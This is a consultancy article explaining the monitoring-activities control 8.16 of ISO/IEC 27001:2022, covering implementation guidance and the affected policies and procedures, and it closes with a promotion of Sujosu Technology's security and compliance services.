Series: New Controls in ISO/IEC 27001:2022 Annex A

Monitoring Activities

In this article series, we are analyzing the implementation aspects of the 11 new controls of ISO/IEC 27001:2022 Annex A. The ninth article of the series explores the new technological control 8.16 (Monitoring activities).

Control

Control 8.16 (Monitoring activities) defines the best practices for the monitoring of networks, systems and applications in order to detect anomalous behaviour and evaluate potential information security incidents.

Attributes

Implementation of this control would help an organization detect anomalous behaviour exhibited by networks, systems and applications. This would help the organization implement corrective actions to avoid information security incidents and hence, address the confidentiality, integrity and availability requirements of its information systems.

Implementation

The organization should monitor for anomalous behaviour of networks, systems and applications against an established baseline. Anomalous behaviour may include unplanned termination of processes, activity generally associated with malware, denial of service, unauthorized access attempts etc. The organization should use monitoring tools that can handle large amounts of data and can recognize specific signatures, and network or application behaviour patterns. The tools should generate alerts which can be interpreted correctly by personnel so that appropriate actions may be taken.

The monitoring activities should be carried out in accordance with business requirements, perceived risks, and relevant laws and regulations. Records of monitoring should be maintained and stored securely by the organization for pre-defined time-periods.

Artefacts

The contents and implementation of the following security policies and procedures may be impacted by the above control:

• System Monitoring Policy – This policy defines the rules for monitoring of system use and related user activities.

• Procedure for Monitoring Areas of Risk – This procedure defines the steps to detect unauthorized activities by monitoring system use within the organization.

• Server and Network Device Monitoring and Maintenance Procedure – This procedure defines the steps for monitoring of servers, networking components and security appliances for both security and performance issues.

• Security Operating Procedures – Rules for the monitoring of networks, systems and applications may be defined within security operating procedures.

• Monitoring Records – Records of monitoring should be maintained by the organization.

  
  

How Sujosu Technology Can Help

Sujosu Technology helps organizations design and implement systems that prioritize cyber security, data privacy and compliance. Our services include:

• Risk Assessments: Identifying cyber security and privacy requirements and vulnerabilities in applications and infrastructure.

• Countermeasures and Solutions: Providing tailored strategies to prevent, detect and recover from potential attacks.

• Compliance Documentation: Helping you comply with the requirements of specific standards and regulations by compiling policies, procedures and other relevant manuals.

• Training and Awareness: Equipping your team with the knowledge to address cyber security and privacy challenges effectively.

• With Sujosu Technology’s expertise, your organization can build systems that are secure and resilient against security and privacy breaches. We can also help you achieve compliance with relevant standards and legislations. Besides, we organize webinars and publish insightful articles to create awareness on various aspects of cyber security and data privacy.

  
  

Partner with Sujosu Technology

Protect your data and ensure compliance with Sujosu Technology’s state-of-the-art cyber security and privacy services. Stay ahead of challenges and foster trust with your stakeholders.